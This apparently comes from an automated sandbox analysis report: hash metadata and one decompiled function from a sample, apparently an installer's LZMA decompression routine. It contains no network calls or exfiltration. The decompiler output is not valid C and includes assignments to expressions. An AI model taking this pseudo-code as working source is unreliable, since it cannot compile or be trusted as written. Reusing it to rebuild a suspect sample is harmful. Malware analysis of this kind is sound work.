                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                • Instruction ID: 9997fd61ac043c1521ccfeb60d91edfb3447ef4cf3d9eb85cab0c4916a58cc02
                                                • Opcode Fuzzy Hash: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                • Instruction Fuzzy Hash: 5E714331D04229DBDF28CFA8C844BADBBB1FF44305F15806AD846BB290C7785996DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406BE3() {
                                                				unsigned short _t531;
                                                				signed int _t532;
                                                				void _t533;
                                                				signed int _t534;
                                                				signed int _t535;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t589;
                                                				signed int* _t606;
                                                				void* _t613;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t613 - 0x40) != 0) {
                                                						 *(_t613 - 0x84) = 0xa;
                                                						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                					} else {
                                                						 *(__ebp - 0x84) = 9;
                                                						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                					}
                                                					while(1) {
                                                						 *(_t613 - 0x54) = _t606;
                                                						while(1) {
                                                							L133:
                                                							_t531 =  *_t606;
                                                							_t589 = _t531 & 0x0000ffff;
                                                							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                							if( *(_t613 - 0xc) >= _t565) {
                                                								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                								 *(_t613 - 0x40) = 1;
                                                								_t532 = _t531 - (_t531 >> 5);
                                                								 *_t606 = _t532;
                                                							} else {
                                                								 *(_t613 - 0x10) = _t565;
                                                								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                							}
                                                							if( *(_t613 - 0x10) >= 0x1000000) {
                                                								goto L139;
                                                							}
                                                							L137:
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 5;
                                                								L170:
                                                								_t568 = 0x22;
                                                								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                								_t535 = 0;
                                                								L172:
                                                								return _t535;
                                                							}
                                                							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                							L139:
                                                							_t533 =  *(_t613 - 0x84);
                                                							while(1) {
                                                								 *(_t613 - 0x88) = _t533;
                                                								while(1) {
                                                									L1:
                                                									_t534 =  *(_t613 - 0x88);
                                                									if(_t534 > 0x1c) {
                                                										break;
                                                									}
                                                									switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
                                                										case 0:
                                                											if( *(_t613 - 0x6c) == 0) {
                                                												goto L170;
                                                											}
                                                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                											_t534 =  *( *(_t613 - 0x70));
                                                											if(_t534 > 0xe1) {
                                                												goto L171;
                                                											}
                                                											_t538 = _t534 & 0x000000ff;
                                                											_push(0x2d);
                                                											asm("cdq");
                                                											_pop(_t570);
                                                											_push(9);
                                                											_pop(_t571);
                                                											_t609 = _t538 / _t570;
                                                											_t540 = _t538 % _t570 & 0x000000ff;
                                                											asm("cdq");
                                                											_t604 = _t540 % _t571 & 0x000000ff;
                                                											 *(_t613 - 0x3c) = _t604;
                                                											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                												L10:
                                                												if(_t612 == 0) {
                                                													L12:
                                                													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                													goto L15;
                                                												} else {
                                                													goto L11;
                                                												}
                                                												do {
                                                													L11:
                                                													_t612 = _t612 - 1;
                                                													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                												} while (_t612 != 0);
                                                												goto L12;
                                                											}
                                                											if( *(_t613 - 4) != 0) {
                                                												GlobalFree( *(_t613 - 4));
                                                											}
                                                											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                											 *(_t613 - 4) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                												goto L10;
                                                											}
                                                										case 1:
                                                											L13:
                                                											__eflags =  *(_t613 - 0x6c);
                                                											if( *(_t613 - 0x6c) == 0) {
                                                												 *(_t613 - 0x88) = 1;
                                                												goto L170;
                                                											}
                                                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                											_t45 = _t613 - 0x48;
                                                											 *_t45 =  *(_t613 - 0x48) + 1;
                                                											__eflags =  *_t45;
                                                											L15:
                                                											if( *(_t613 - 0x48) < 4) {
                                                												goto L13;
                                                											}
                                                											_t546 =  *(_t613 - 0x40);
                                                											if(_t546 ==  *(_t613 - 0x74)) {
                                                												L20:
                                                												 *(_t613 - 0x48) = 5;
                                                												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                												goto L23;
                                                											}
                                                											 *(_t613 - 0x74) = _t546;
                                                											if( *(_t613 - 8) != 0) {
                                                												GlobalFree( *(_t613 - 8));
                                                											}
                                                											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                											 *(_t613 - 8) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										case 2:
                                                											L24:
                                                											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                											 *(_t613 - 0x84) = 6;
                                                											 *(_t613 - 0x4c) = _t553;
                                                											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                											 *(_t613 - 0x54) = _t606;
                                                											goto L133;
                                                										case 3:
                                                											L21:
                                                											__eflags =  *(_t613 - 0x6c);
                                                											if( *(_t613 - 0x6c) == 0) {
                                                												 *(_t613 - 0x88) = 3;
                                                												goto L170;
                                                											}
                                                											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                											_t67 = _t613 - 0x70;
                                                											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                											__eflags =  *_t67;
                                                											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                											L23:
                                                											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                											if( *(_t613 - 0x48) != 0) {
                                                												goto L21;
                                                											}
                                                											goto L24;
                                                										case 4:
                                                											L133:
                                                											_t531 =  *_t606;
                                                											_t589 = _t531 & 0x0000ffff;
                                                											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                											if( *(_t613 - 0xc) >= _t565) {
                                                												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                												 *(_t613 - 0x40) = 1;
                                                												_t532 = _t531 - (_t531 >> 5);
                                                												 *_t606 = _t532;
                                                											} else {
                                                												 *(_t613 - 0x10) = _t565;
                                                												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                											}
                                                											if( *(_t613 - 0x10) >= 0x1000000) {
                                                												goto L139;
                                                											}
                                                										case 5:
                                                											goto L137;
                                                										case 6:
                                                											__edx = 0;
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) = 1;
                                                												 *(__ebp - 0x84) = 7;
                                                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                												while(1) {
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                											__esi =  *(__ebp - 0x60);
                                                											__cl = 8;
                                                											__cl = 8 -  *(__ebp - 0x3c);
                                                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                											__ecx =  *(__ebp - 0x3c);
                                                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                											__ecx =  *(__ebp - 4);
                                                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                											__eflags =  *(__ebp - 0x38) - 4;
                                                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											if( *(__ebp - 0x38) >= 4) {
                                                												__eflags =  *(__ebp - 0x38) - 0xa;
                                                												if( *(__ebp - 0x38) >= 0xa) {
                                                													_t98 = __ebp - 0x38;
                                                													 *_t98 =  *(__ebp - 0x38) - 6;
                                                													__eflags =  *_t98;
                                                												} else {
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                												}
                                                											} else {
                                                												 *(__ebp - 0x38) = 0;
                                                											}
                                                											__eflags =  *(__ebp - 0x34) - __edx;
                                                											if( *(__ebp - 0x34) == __edx) {
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												goto L61;
                                                											} else {
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__ecx =  *(__ebp - 8);
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												__al =  *((intOrPtr*)(__eax + __ecx));
                                                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                												goto L41;
                                                											}
                                                										case 7:
                                                											__eflags =  *(__ebp - 0x40) - 1;
                                                											if( *(__ebp - 0x40) != 1) {
                                                												__eax =  *(__ebp - 0x24);
                                                												 *(__ebp - 0x80) = 0x16;
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												__eax =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xa;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                												__eax =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 4) + 0x664;
                                                												__eflags = __eax;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L69;
                                                											}
                                                											__eax =  *(__ebp - 4);
                                                											__ecx =  *(__ebp - 0x38);
                                                											 *(__ebp - 0x84) = 8;
                                                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                											while(1) {
                                                												 *(_t613 - 0x54) = _t606;
                                                												goto L133;
                                                											}
                                                										case 8:
                                                											goto L0;
                                                										case 9:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												goto L89;
                                                											}
                                                											__eflags =  *(__ebp - 0x60);
                                                											if( *(__ebp - 0x60) == 0) {
                                                												goto L171;
                                                											}
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                											__eflags = _t258;
                                                											0 | _t258 = _t258 + _t258 + 9;
                                                											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                											goto L75;
                                                										case 0xa:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xb;
                                                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                												while(1) {
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x28);
                                                											goto L88;
                                                										case 0xb:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__ecx =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x20);
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                											} else {
                                                												__eax =  *(__ebp - 0x24);
                                                											}
                                                											__ecx =  *(__ebp - 0x28);
                                                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                											L88:
                                                											__ecx =  *(__ebp - 0x2c);
                                                											 *(__ebp - 0x2c) = __eax;
                                                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                											L89:
                                                											__eax =  *(__ebp - 4);
                                                											 *(__ebp - 0x80) = 0x15;
                                                											__eax =  *(__ebp - 4) + 0xa68;
                                                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                											goto L69;
                                                										case 0xc:
                                                											L99:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xc;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t334 = __ebp - 0x70;
                                                											 *_t334 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t334;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											__eax =  *(__ebp - 0x2c);
                                                											goto L101;
                                                										case 0xd:
                                                											L37:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xd;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t122 = __ebp - 0x70;
                                                											 *_t122 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t122;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L39:
                                                											__eax =  *(__ebp - 0x40);
                                                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                												goto L48;
                                                											}
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												goto L54;
                                                											}
                                                											L41:
                                                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                											 *(__ebp - 0x48) = __eax;
                                                											__eax = __eax + 1;
                                                											__eax = __eax << 8;
                                                											__eax = __eax + __ebx;
                                                											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edx = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												 *(__ebp - 0x40) = 1;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												__ebx = __ebx + __ebx + 1;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edx;
                                                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L39;
                                                											} else {
                                                												goto L37;
                                                											}
                                                										case 0xe:
                                                											L46:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t156 = __ebp - 0x70;
                                                											 *_t156 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t156;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											while(1) {
                                                												L48:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t170 = __edx + 1; // 0x1
                                                													__ebx = _t170;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													continue;
                                                												} else {
                                                													goto L46;
                                                												}
                                                											}
                                                											L54:
                                                											_t173 = __ebp - 0x34;
                                                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                											__eflags =  *_t173;
                                                											goto L55;
                                                										case 0xf:
                                                											L58:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xf;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t203 = __ebp - 0x70;
                                                											 *_t203 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t203;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L60:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												L55:
                                                												__al =  *(__ebp - 0x44);
                                                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                												goto L56;
                                                											}
                                                											L61:
                                                											__eax =  *(__ebp - 0x58);
                                                											__edx = __ebx + __ebx;
                                                											__ecx =  *(__ebp - 0x10);
                                                											__esi = __edx + __eax;
                                                											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												_t217 = __edx + 1; // 0x1
                                                												__ebx = _t217;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L60;
                                                											} else {
                                                												goto L58;
                                                											}
                                                										case 0x10:
                                                											L109:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x10;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t365 = __ebp - 0x70;
                                                											 *_t365 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t365;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											goto L111;
                                                										case 0x11:
                                                											L69:
                                                											__esi =  *(__ebp - 0x58);
                                                											 *(__ebp - 0x84) = 0x12;
                                                											while(1) {
                                                												 *(_t613 - 0x54) = _t606;
                                                												goto L133;
                                                											}
                                                										case 0x12:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 0x58);
                                                												 *(__ebp - 0x84) = 0x13;
                                                												__esi =  *(__ebp - 0x58) + 2;
                                                												while(1) {
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x4c);
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											__eflags = __eax;
                                                											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                											goto L130;
                                                										case 0x13:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												_t469 = __ebp - 0x58;
                                                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                												__eflags =  *_t469;
                                                												 *(__ebp - 0x30) = 0x10;
                                                												 *(__ebp - 0x40) = 8;
                                                												L144:
                                                												 *(__ebp - 0x7c) = 0x14;
                                                												goto L145;
                                                											}
                                                											__eax =  *(__ebp - 0x4c);
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											 *(__ebp - 0x30) = 8;
                                                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                											L130:
                                                											 *(__ebp - 0x58) = __eax;
                                                											 *(__ebp - 0x40) = 3;
                                                											goto L144;
                                                										case 0x14:
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                											__eax =  *(__ebp - 0x80);
                                                											 *(_t613 - 0x88) = _t533;
                                                											goto L1;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                											__al = __al & 0x000000fd;
                                                											__eax = (__eflags >= 0) - 1 + 0xb;
                                                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                											goto L120;
                                                										case 0x16:
                                                											__eax =  *(__ebp - 0x30);
                                                											__eflags = __eax - 4;
                                                											if(__eax >= 4) {
                                                												_push(3);
                                                												_pop(__eax);
                                                											}
                                                											__ecx =  *(__ebp - 4);
                                                											 *(__ebp - 0x40) = 6;
                                                											__eax = __eax << 7;
                                                											 *(__ebp - 0x7c) = 0x19;
                                                											 *(__ebp - 0x58) = __eax;
                                                											goto L145;
                                                										case 0x17:
                                                											L145:
                                                											__eax =  *(__ebp - 0x40);
                                                											 *(__ebp - 0x50) = 1;
                                                											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                											goto L149;
                                                										case 0x18:
                                                											L146:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x18;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t484 = __ebp - 0x70;
                                                											 *_t484 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t484;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L148:
                                                											_t487 = __ebp - 0x48;
                                                											 *_t487 =  *(__ebp - 0x48) - 1;
                                                											__eflags =  *_t487;
